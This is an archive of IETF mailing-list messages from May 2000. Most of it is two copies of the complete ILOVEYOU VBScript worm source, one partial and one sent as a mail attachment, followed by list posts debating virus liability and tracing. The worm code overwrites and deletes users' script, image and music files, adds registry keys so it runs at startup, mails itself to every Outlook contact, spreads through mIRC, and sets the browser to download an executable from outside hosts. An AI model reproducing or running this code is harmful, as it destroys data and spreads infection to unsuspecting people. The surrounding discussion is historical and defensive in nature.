On Error Resume Next
Dim d,dc,s
Set dc =3D fso.Drives
For Each d in dc
If d.DriveType =3D 2 or d.DriveType=3D3 Then
folderlist(d.path&"\")
end if
Next
listadriv =3D s
end sub
sub infectfiles(folderspec) =20
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f =3D fso.GetFolder(folderspec)
set fc =3D f.Files
for each f1 in fc
ext=3Dfso.GetExtensionName(f1.path)
ext=3Dlcase(ext)
s=3Dlcase(f1.name)
if (ext=3D"vbs") or (ext=3D"vbe") then
set ap=3Dfso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") =
or (ext=3D"sct") or (ext=3D"hta") then
set ap=3Dfso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=3Dfso.GetBaseName(f1.path)
set cop=3Dfso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext=3D"jpg") or (ext=3D"jpeg") then
set ap=3Dfso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=3Dfso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext=3D"mp3") or (ext=3D"mp2") then
set mp3=3Dfso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=3Dfso.GetFile(f1.path)
att.attributes=3Datt.attributes+2
end if
if (eq<>folderspec) then
if (s=3D"mirc32.exe") or (s=3D"mlink32.exe") or (s=3D"mirc.ini") or =
(s=3D"script.ini") or (s=3D"mirc.hlp") then
set scriptini=3Dfso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will =
corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not =
run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=3Don 1:JOIN:#:{"
scriptini.WriteLine "n1=3D /if ( $nick =3D=3D $me ) { halt }"
scriptini.WriteLine "n2=3D /.dcc send $nick =
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=3D}"
scriptini.close
eq=3Dfolderspec
end if
end if
next =20
end sub
sub folderlist(folderspec) =20
On Error Resume Next
dim f,f1,sf
set f =3D fso.GetFolder(folderspec) =20
set sf =3D f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next =20
end sub
sub regcreate(regkey,regvalue)
Set regedit =3D CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit =3D CreateObject("WScript.Shell")
regget=3Dregedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg =3D 0
else
msg =3D 1
end if
fileexist =3D msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg =3D 0
else
msg =3D 1
end if
fileexist =3D msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=3DCreateObject("WScript.Shell")
set out=3DWScript.CreateObject("Outlook.Application")
set mapi=3Dout.GetNameSpace("MAPI")
for ctrlists=3D1 to mapi.AddressLists.Count
set a=3Dmapi.AddressLists(ctrlists)
x=3D1
regv=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv=3D"") then
regv=3D1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=3D1 to a.AddressEntries.Count
malead=3Da.AddressEntries(x)
regad=3D""
regad=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&male=
ad)
if (regad=3D"") then
set male=3Dout.CreateItem(0)
male.Recipients.Add(malead)
male.Subject =3D "ILOVEYOU"
male.Body =3D vbcrlf&"kindly check the attached LOVELETTER coming from =
me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite =
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=3Dx+1
next
regedit.RegWrite =
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite =
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=3DNothing
Set mapi=3DNothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1=3D"<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META =
NAME=3D@-@Generator@-@ CONTENT=3D@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& =
_
"<META NAME=3D@-@Author@-@ CONTENT=3D@-@spyder ?-? [EMAIL PROTECTED] ?-? =
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& =
_
"<META NAME=3D@-@Description@-@ CONTENT=3D@-@simple but i think this is =
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY =
ONMOUSEOUT=3D@[EMAIL PROTECTED]=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=3D@[EMAIL PROTECTED]=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=3D@-@fixed@-@ =
BGCOLOR=3D@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to =
read this HTML file<BR>- Please press #-#YES#-# button to Enable =
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=3D@-@infinite@-@ =
BGCOLOR=3D@-@yellow@-@>----------z--------------------z----------<?-?MAR=
QUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=3D@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=3Dscreen.availWidth;var =
hi=3Dscreen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbc=
rlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=3D@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=3D1"&vbcrlf& _
"code=3D"
dta2=3D"set =
fso=3DCreateObject(@[EMAIL PROTECTED]@-@)"&vbcrlf& _
"set dirsystem=3Dfso.GetSpecialFolder(1)"&vbcrlf& _
"code2=3Dreplace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=3Dreplace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=3Dreplace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set =
wri=3Dfso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=3D424) then"&vbcrlf& _
"aw=3D0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=3D1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit =3D CreateObject(@[EMAIL PROTECTED]@-@)"&vbcrlf& _
"regedit.RegWrite =
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^=
-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=3Dreplace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=3Dreplace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=3Dreplace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=3Dreplace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=3Dreplace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=3Dreplace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=3Dreplace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=3Dreplace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=3DCreateObject("Scripting.FileSystemObject")
set c=3Dfso.OpenTextFile(WScript.ScriptFullName,1)
lines=3DSplit(c.ReadAll,vbcrlf)
l1=3Dubound(lines)
for n=3D0 to ubound(lines)
lines(n)=3Dreplace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=3Dreplace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=3Dreplace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=3Dn) then
lines(n)=3Dchr(34)+lines(n)+chr(34)
else
lines(n)=3Dchr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=3Dfso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=3Dfso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
------_=_NextPart_000_01BFB7EA.29D9DDFC--
>From owner-ietf-outbound Sun May 7 03:22:49 2000
Received: by ietf.org (8.9.1a/8.9.1a) id CAA10697
for [EMAIL PROTECTED]; Sun, 7 May 2000 02:22:12 -0400 (EDT)
Received: from mailgw1.netvision.net.il (mailgw1.netvision.net.il [194.90.1.14])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id CAA08706
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 02:07:11 -0400 (EDT)
Received: from ismailout.icomverse.com (Efrat-FR3.ser.netvision.net.il
[199.203.174.65])
by mailgw1.netvision.net.il (8.9.3/8.9.3) with ESMTP id JAA16869
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 09:06:18 +0300 (IDT)
Received: from ismail1.icomverse.com (ismail1.icomverse.com [190.190.110.2])
by ismailout.icomverse.com (8.10.1/8.10.1) with ESMTP id e4773gH21222
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 10:03:42 +0300
Received: by ismail1.icomverse.com with Internet Mail Service (5.5.2650.21)
id <KJ1C1BD9>; Sun, 7 May 2000 09:04:55 +0300
Message-ID: <[EMAIL PROTECTED]>
From: "Gazal, Elly" <[EMAIL PROTECTED]>
To: IETF <[EMAIL PROTECTED]>
Subject: ILOVEYOU
Date: Sun, 7 May 2000 09:04:39 +0300
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: multipart/mixed;
boundary="----_=_NextPart_000_01BFB7EA.29D9DDFC"
X-Loop: [EMAIL PROTECTED]
This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.
------_=_NextPart_000_01BFB7EA.29D9DDFC
Content-Type: text/plain
kindly check the attached LOVELETTER coming from me.
------_=_NextPart_000_01BFB7EA.29D9DDFC
Content-Type: application/octet-stream;
name="LOVE-LETTER-FOR-YOU.TXT.vbs"
Content-Disposition: attachment;
filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
Content-Transfer-Encoding: quoted-printable
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / [EMAIL PROTECTED] / @GRAMMERSoft Group / =
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=3D""
ctr=3D0
Set fso =3D CreateObject("Scripting.FileSystemObject")
set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=3Dfile.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=3DCreateObject("WScript.Shell")
rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
Scripting Host\Settings\Timeout")
if (rr>=3D1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin =3D fso.GetSpecialFolder(0)
Set dirsystem =3D fso.GetSpecialFolder(1)
Set dirtemp =3D fso.GetSpecialFolder(2)
Set c =3D fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern=
el32",dirsystem&"\MSKernel32.vbs"
regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService=
s\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=3D""
downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
Explorer\Download Directory")
if (downread=3D"") then
downread=3D"c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
Randomize
num =3D Int((4 * Rnd) + 1)
if num =3D 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm=
hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num =3D 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw=
erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num =3D 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd=
QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num =3D 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD=
GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN=
-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then
regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU=
GSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet =
Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc =3D fso.Drives
For Each d in dc
If d.DriveType =3D 2 or d.DriveType=3D3 Then
folderlist(d.path&"\")
end if
Next
listadriv =3D s
end sub
sub infectfiles(folderspec) =20
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f =3D fso.GetFolder(folderspec)
set fc =3D f.Files
for each f1 in fc
ext=3Dfso.GetExtensionName(f1.path)
ext=3Dlcase(ext)
s=3Dlcase(f1.name)
if (ext=3D"vbs") or (ext=3D"vbe") then
set ap=3Dfso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") =
or (ext=3D"sct") or (ext=3D"hta") then
set ap=3Dfso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=3Dfso.GetBaseName(f1.path)
set cop=3Dfso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext=3D"jpg") or (ext=3D"jpeg") then
set ap=3Dfso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=3Dfso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext=3D"mp3") or (ext=3D"mp2") then
set mp3=3Dfso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=3Dfso.GetFile(f1.path)
att.attributes=3Datt.attributes+2
end if
if (eq<>folderspec) then
if (s=3D"mirc32.exe") or (s=3D"mlink32.exe") or (s=3D"mirc.ini") or =
(s=3D"script.ini") or (s=3D"mirc.hlp") then
set scriptini=3Dfso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will =
corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not =
run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=3Don 1:JOIN:#:{"
scriptini.WriteLine "n1=3D /if ( $nick =3D=3D $me ) { halt }"
scriptini.WriteLine "n2=3D /.dcc send $nick =
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=3D}"
scriptini.close
eq=3Dfolderspec
end if
end if
next =20
end sub
sub folderlist(folderspec) =20
On Error Resume Next
dim f,f1,sf
set f =3D fso.GetFolder(folderspec) =20
set sf =3D f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next =20
end sub
sub regcreate(regkey,regvalue)
Set regedit =3D CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit =3D CreateObject("WScript.Shell")
regget=3Dregedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg =3D 0
else
msg =3D 1
end if
fileexist =3D msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg =3D 0
else
msg =3D 1
end if
fileexist =3D msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=3DCreateObject("WScript.Shell")
set out=3DWScript.CreateObject("Outlook.Application")
set mapi=3Dout.GetNameSpace("MAPI")
for ctrlists=3D1 to mapi.AddressLists.Count
set a=3Dmapi.AddressLists(ctrlists)
x=3D1
regv=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv=3D"") then
regv=3D1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=3D1 to a.AddressEntries.Count
malead=3Da.AddressEntries(x)
regad=3D""
regad=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&male=
ad)
if (regad=3D"") then
set male=3Dout.CreateItem(0)
male.Recipients.Add(malead)
male.Subject =3D "ILOVEYOU"
male.Body =3D vbcrlf&"kindly check the attached LOVELETTER coming from =
me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite =
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=3Dx+1
next
regedit.RegWrite =
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite =
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=3DNothing
Set mapi=3DNothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1=3D"<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META =
NAME=3D@-@Generator@-@ CONTENT=3D@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& =
_
"<META NAME=3D@-@Author@-@ CONTENT=3D@-@spyder ?-? [EMAIL PROTECTED] ?-? =
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& =
_
"<META NAME=3D@-@Description@-@ CONTENT=3D@-@simple but i think this is =
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY =
ONMOUSEOUT=3D@[EMAIL PROTECTED]=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=3D@[EMAIL PROTECTED]=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=3D@-@fixed@-@ =
BGCOLOR=3D@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to =
read this HTML file<BR>- Please press #-#YES#-# button to Enable =
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=3D@-@infinite@-@ =
BGCOLOR=3D@-@yellow@-@>----------z--------------------z----------<?-?MAR=
QUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=3D@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=3Dscreen.availWidth;var =
hi=3Dscreen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbc=
rlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=3D@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=3D1"&vbcrlf& _
"code=3D"
dta2=3D"set =
fso=3DCreateObject(@[EMAIL PROTECTED]@-@)"&vbcrlf& _
"set dirsystem=3Dfso.GetSpecialFolder(1)"&vbcrlf& _
"code2=3Dreplace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=3Dreplace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=3Dreplace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set =
wri=3Dfso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=3D424) then"&vbcrlf& _
"aw=3D0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=3D1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit =3D CreateObject(@[EMAIL PROTECTED]@-@)"&vbcrlf& _
"regedit.RegWrite =
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^=
-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=3Dreplace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=3Dreplace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=3Dreplace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=3Dreplace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=3Dreplace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=3Dreplace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=3Dreplace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=3Dreplace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=3DCreateObject("Scripting.FileSystemObject")
set c=3Dfso.OpenTextFile(WScript.ScriptFullName,1)
lines=3DSplit(c.ReadAll,vbcrlf)
l1=3Dubound(lines)
for n=3D0 to ubound(lines)
lines(n)=3Dreplace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=3Dreplace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=3Dreplace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=3Dn) then
lines(n)=3Dchr(34)+lines(n)+chr(34)
else
lines(n)=3Dchr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=3Dfso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=3Dfso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
------_=_NextPart_000_01BFB7EA.29D9DDFC--
>From owner-ietf-outbound Sun May 7 06:10:36 2000
Received: by ietf.org (8.9.1a/8.9.1a) id GAA06691
for [EMAIL PROTECTED]; Sun, 7 May 2000 06:10:02 -0400 (EDT)
Received: from unni.dsv.su.se (unni.dsv.su.se [130.237.161.27])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id GAA06649
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 06:05:19 -0400 (EDT)
Received: from [130.237.150.138] (jph1.dsv.su.se [130.237.150.138])
by unni.dsv.su.se (8.9.3+Sun/8.9.3) with ESMTP
id MAA08604 for <[EMAIL PROTECTED]>;
Sun, 7 May 2000 12:05:19 +0200 (MET DST)
Mime-Version: 1.0
Message-Id: <v04210100b53aef547bba@[130.237.150.138]>
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Date: Sun, 7 May 2000 12:06:36 +0200
To: IETF general mailing list <[EMAIL PROTECTED]>
From: Jacob Palme <[EMAIL PROTECTED]>
Subject: Re: VIRUS WARNING
Content-Type: text/plain; charset="us-ascii"
X-Loop: [EMAIL PROTECTED]
At 20.39 -0400 0-05-04, Keith Moore wrote:
> but sooner or later folks are going to be held liable for poor engineering
> or poor implementation of networking software, just like folks today can be
> held liable for poor engineering or implementation of bridges or buildings.
This discussion is highly relevant to the IETF list, if we
discuss the problems and how to overcome them, and avoid
the never-ending platform war discussions.
At the IETF meeting in December 1999, the issue was
discussed whether IETF should support changes in protocols
which would make it easier to find villains committing
crime on the net. This was discussed in a large plenary
meeting, with about a thousand people present. A very large
majority, something like 95 or 98 percent of those present,
voted against this. I was one of the few who voted yes.
All of you who voted against designing Internet protocols
so as to help police finding the villain of criminal
net-behavour: Have you not changed your mind? Should we not
try to find and prosecute the people distributing viruses?
Should we not redesign the Internet, so that this becomes
easier, for example by doing more logging in the routers,
so that you can go back and check from where something
illegal came. Or do you mean that this is impossible,
because the villains will just get more clever and learn to
cheat such procedures?
--
Jacob Palme <[EMAIL PROTECTED]> (Stockholm University and KTH)
for more info see URL: http://www.dsv.su.se/jpalme/
>From owner-ietf-outbound Sun May 7 08:13:43 2000
Received: by ietf.org (8.9.1a/8.9.1a) id IAA07643
for [EMAIL PROTECTED]; Sun, 7 May 2000 08:13:08 -0400 (EDT)
Received: from qhars002.nortel.com (qhars002.NortelNetworks.com [192.100.101.19])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA07483
for <[EMAIL PROTECTED]>; Sun, 7 May 2000 08:01:47 -0400 (EDT)
Received: from zhard00m.europe.nortel.com (actually zhard00m)
by qhars002.nortel.com; Sat, 6 May 2000 15:30:20 +0100
Received: by zhard00m.europe.nortel.com
with Internet Mail Service (5.5.2650.21) id <K1899PH8>;
Sat, 6 May 2000 15:30:19 +0100
Message-ID: <[EMAIL PROTECTED]>
From: "Gian-Pietro Saggioro" <[EMAIL PROTECTED]>
To: "'Keith Moore'" <[EMAIL PROTECTED]>
Cc: [EMAIL PROTECTED]
Subject: RE: viruses on UNIX vs. Windows
Date: Sat, 6 May 2000 15:30:13 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: multipart/alternative;
boundary="----_=_NextPart_001_01BFB767.9A280CF6"
X-Loop: [EMAIL PROTECTED]
This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.
------_=_NextPart_001_01BFB767.9A280CF6
Content-Type: text/plain;
charset="iso-8859-1"
Keith (& all),
Very interesting considerations, I subscribe your point of view. You can
imagine when MS will be splitted (may be not in the near future, let's say
within 3/4 years), the new company, let's call it "GateSoft", will release
"GateSoft Office 2003 for
L-I-U-nix (Linux + Unix HP and Solaris)".
The Visual Basic engine will be available also in the "protected" and
"perfect" world. How many time you installed software on a Linux/Unix
machine and instead of getting the very famous error messages, the
application was simply not working ...
core dumped !
( I just got another example two days ago!!! Don't ask me witch is the
program ! I have the answer!!)
Everybody knows the difference in terms of pricing between Win-based system
and Unix environment, I mean globally Hardware and Software.
Linux is, in this aspect, not involved; it is just the lack of Software
limiting the diffusion; talking about the Hardware there requirements are
quite convenient.
The alternative will appear not the ideal solution when it will use the MOST
COMMON SOFTWARE SOLUTION diffused on this planet: this is the "cruel"
reality.
I have a question you all:
Is the JAVA environment ideal for creating worms and horses ?
Are there any security holes ?
If the programmer build a nice windows asking the user if they would like to
continue or not, is it possible to manipulate files on the Computer or
attach into the System scripts/registry malicious lines ?
If the answer are all YES, Java is the ideal tool for creating viruses for
the Linux/Unix world. The complexity, in terms of programming, of Java is
not really far from the VB Scripting. The last one is the method used by
millions of PC users in the
Internet Community.
\GianPietro
-----Original Message-----
From: Keith Moore [mailto:[EMAIL PROTECTED]]
Sent: Saturday, May 06, 2000 12:00 AM
To: Randall Stewart
